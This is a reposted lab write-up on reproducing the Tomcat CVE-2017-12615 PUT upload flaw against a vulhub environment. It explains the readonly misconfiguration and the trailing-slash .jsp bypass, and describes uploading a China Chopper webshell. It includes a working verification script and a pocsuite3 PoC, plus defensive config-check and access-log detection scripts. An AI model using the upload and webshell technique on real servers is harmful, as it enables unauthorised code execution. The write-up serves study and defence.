
CVE-2017-12615 Vulnerability Reproduction Process

程序员文章站 2022-03-27 22:25:11

CVE-2017-12615 Vulnerability Reproduction

Environment setup: https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615
Tomcat version: 8.5.19

Vulnerability principle:
Tomcat's configuration grants write permission, so arbitrary files can be uploaded with the HTTP PUT method. Tomcat does check the suffix of the uploaded file name, but the check can be bypassed by appending a / to the path, e.g. /shell.jsp/.
Source of the configuration (Tomcat's conf/web.xml):

    <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
            <param-name>readonly</param-name>
            <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>

readonly is set to false, which means the DefaultServlet allows files to be written.
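As an added example (not code from the original post or from vulhub), the following Python script checks a web.xml fragment for exactly this setting. It reports the effective readonly value of every DefaultServlet declaration, treating a missing parameter as Tomcat's documented default of true. Both web.xml fragments are constructed samples: the weak one mirrors the configuration above, the hardened one simply omits the parameter (setting it explicitly to true is equivalent).

```python
import xml.etree.ElementTree as ET

# Constructed sample: the DefaultServlet block of a Tomcat conf/web.xml with the
# weak setting. readonly=false lets PUT/DELETE create or remove files.
WEAK_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>listings</param-name><param-value>false</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

# Constructed sample: the hardened form. The parameter is absent, so Tomcat's
# default (readonly=true) applies and write methods are refused.
SAFE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
  </servlet>
</web-app>"""

DEFAULT_SERVLET_CLASS = 'org.apache.catalina.servlets.DefaultServlet'


def _local(tag):
    """Strip the XML namespace so the check works with or without an xmlns declaration."""
    return tag.rsplit('}', 1)[-1]


def default_servlet_readonly(web_xml_text):
    """Return {servlet-name: effective readonly (bool)} for every DefaultServlet declaration.

    A missing readonly init-param means Tomcat's default, which is True.
    """
    root = ET.fromstring(web_xml_text)
    findings = {}
    for servlet in root.iter():
        if _local(servlet.tag) != 'servlet':
            continue
        name, clazz, readonly = None, None, True
        for child in servlet:
            tag = _local(child.tag)
            if tag == 'servlet-name':
                name = (child.text or '').strip()
            elif tag == 'servlet-class':
                clazz = (child.text or '').strip()
            elif tag == 'init-param':
                params = {_local(p.tag): (p.text or '').strip() for p in child}
                if params.get('param-name') == 'readonly':
                    readonly = params.get('param-value', 'true').lower() != 'false'
        if clazz == DEFAULT_SERVLET_CLASS:
            findings[name] = readonly
    return findings


def is_writable(web_xml_text):
    """True if any DefaultServlet accepts PUT/DELETE, i.e. readonly is false."""
    return any(not ro for ro in default_servlet_readonly(web_xml_text).values())


if __name__ == '__main__':
    for label, doc in (('weak', WEAK_WEB_XML), ('safe', SAFE_WEB_XML)):
        state = 'WRITABLE' if is_writable(doc) else 'ok'
        print(label, default_servlet_readonly(doc), state)
```

Run it against a real conf/web.xml by reading the file into a string and passing it to is_writable(); a True result is the condition this write-up exploits, and the remediation is to remove the readonly parameter or set it to true.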

  1. Submit the request and inspect it in Burp.
     [screenshot: CVE-2017-12615 reproduction]
  2. In the Repeater module, modify the submitted request to upload a China Chopper (Caidao) one-line JSP webshell.
     [screenshot: CVE-2017-12615 reproduction]
  3. Connect with China Chopper.
     [screenshots: CVE-2017-12615 reproduction]
     Connection successful.

Reference: https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md

Writing a PoC for this vulnerability: the --verify mode

  • First, learn how to use the PUT method of the requests module.
  • [screenshot: CVE-2017-12615 reproduction]

Approach of the verification module:

  1. First submit a .txt file with the PUT method.
  2. Then request the new URL with GET and read the page content; if the status code is 200 and the written text appears in the page, the vulnerability exists.

Below is the script used to test the PUT method locally on Windows:
    import requests

    url = 'http://192.168.0.104:8080/'
    data = "hello world"
    new_url = url + "tcc.txt"

    # Write a harmless text file with PUT, then read it back with GET
    res = requests.put(url=new_url, data=data)
    response = requests.get(url=new_url)
    print(response.url)
    print(response.status_code)
    if response.status_code == 200 and "hello world" in response.text:
        print(response.url)
        print("success")

Finally, the PoC is completed with the pocsuite3 framework:

    from pocsuite3.api import POCBase, Output, register_poc, logger, requests, VUL_TYPE


    class DemoPOC(POCBase):  # implementation class DemoPOC, inheriting from POCBase
        vulID = '1.1'
        version = '1.1'
        author = ['1']
        vulDate = '1.1'
        createDate = '2020/10/10'
        updateDate = '1.1'
        references = ['tomcat']
        name = 'tomcat-poc'
        appPowerLink = 'tomcat'
        appName = 'tomcat'
        appVersion = 'tomcat'
        vulType = VUL_TYPE.CODE_EXECUTION
        desc = '''
            tomcat
        '''
        # samples = ['96.234.71.117:80']
        # category = POC_CATEGORY.EXPLOITS.REMOTE

        def _verify(self):  # verification function
            result = {}  # result dictionary returned to the framework
            path = "/vluhub.txt"
            url = self.url + path
            payload = "target is vulnerable"
            try:
                # Write a harmless text file with PUT, then read it back with GET
                requests.put(url=url, data=payload)
                response = requests.get(url=url)
                if response.status_code == 200 and "target is vulnerable" in response.text:
                    # Keep both the URL and the payload instead of overwriting one with the other
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = url
                    result['VerifyInfo']['Payload'] = payload
            except Exception as e:
                logger.error(str(e))
            return self.parse_output(result)

        def _attack(self):
            # Note: if the PoC has no attack mode, _attack() simply returns self._verify()
            return self._verify()

        def parse_output(self, result):
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('target is not vulnerable')
            return output


    register_poc(DemoPOC)
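From the defender's side, the PUT-then-GET probe used by the scripts above leaves a recognisable trace in Tomcat's access log. The following Python script is an added example and not part of the original post: it parses lines in Tomcat's default access-log pattern (%h %l %u %t "%r" %s %b), flags every PUT or DELETE request, and raises the severity when the target is a .jsp written with the trailing-slash trick described earlier. The log lines are constructed samples that reuse the 192.168.0.104 host from the local test.

```python
import re
from collections import namedtuple

# Constructed sample lines in Tomcat's default access-log format (%h %l %u %t "%r" %s %b).
# The bytes field is "-" when the response body is empty, as Tomcat logs it.
SAMPLE_ACCESS_LOG = """\
192.168.0.104 - - [27/Mar/2022:22:25:11 +0800] "GET /index.jsp HTTP/1.1" 200 11156
192.168.0.104 - - [27/Mar/2022:22:25:30 +0800] "PUT /tcc.txt HTTP/1.1" 201 -
192.168.0.104 - - [27/Mar/2022:22:25:31 +0800] "GET /tcc.txt HTTP/1.1" 200 11
192.168.0.104 - - [27/Mar/2022:22:26:05 +0800] "PUT /shell.jsp/ HTTP/1.1" 201 -
192.168.0.104 - - [27/Mar/2022:22:26:09 +0800] "GET /shell.jsp HTTP/1.1" 200 42
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

Finding = namedtuple('Finding', 'severity host time method path status reason')

WRITE_METHODS = ('PUT', 'DELETE')
SCRIPT_SUFFIXES = ('.jsp', '.jspx')


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Turn a parsed entry into a Finding if it is a write-method request, else None."""
    method, status = entry['method'], int(entry['status'])
    if method not in WRITE_METHODS:
        return None
    resource = entry['path'].split('?', 1)[0]   # drop any query string
    # The trailing-slash trick from the write-up: "/shell.jsp/" ends up stored as shell.jsp.
    stored = resource.rstrip('/')
    if stored != resource and stored.lower().endswith(SCRIPT_SUFFIXES):
        severity, reason = 'high', 'write of a .jsp with a trailing slash (CVE-2017-12615 pattern)'
    elif stored.lower().endswith(SCRIPT_SUFFIXES):
        severity, reason = 'high', 'write of a server-side script'
    else:
        severity, reason = 'medium', 'write method sent to the web server'
    if status in (201, 204):
        reason += '; server reported success'
    else:
        reason += '; server answered %d' % status
    return Finding(severity, entry['host'], entry['time'], method, resource, status, reason)


def scan(log_text):
    """Return a list of Findings for every write-method request in the log text."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_ACCESS_LOG):
        print(f.severity.upper(), f.host, f.method, f.path, f.status, '-', f.reason)
```

A successful PUT (status 201) followed by a GET of the same path from the same host is the exact sequence the verification module produces, so alerting on any PUT or DELETE accepted by a Tomcat that is supposed to be read-only is a cheap and reliable signal; the high-severity rule catches the .jsp variant regardless of whether the write succeeded.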


Fix

Upgrade the Tomcat version.

Original article: https://blog.csdn.net/qq_34640691/article/details/109051748

Related tags: vluhub reproduction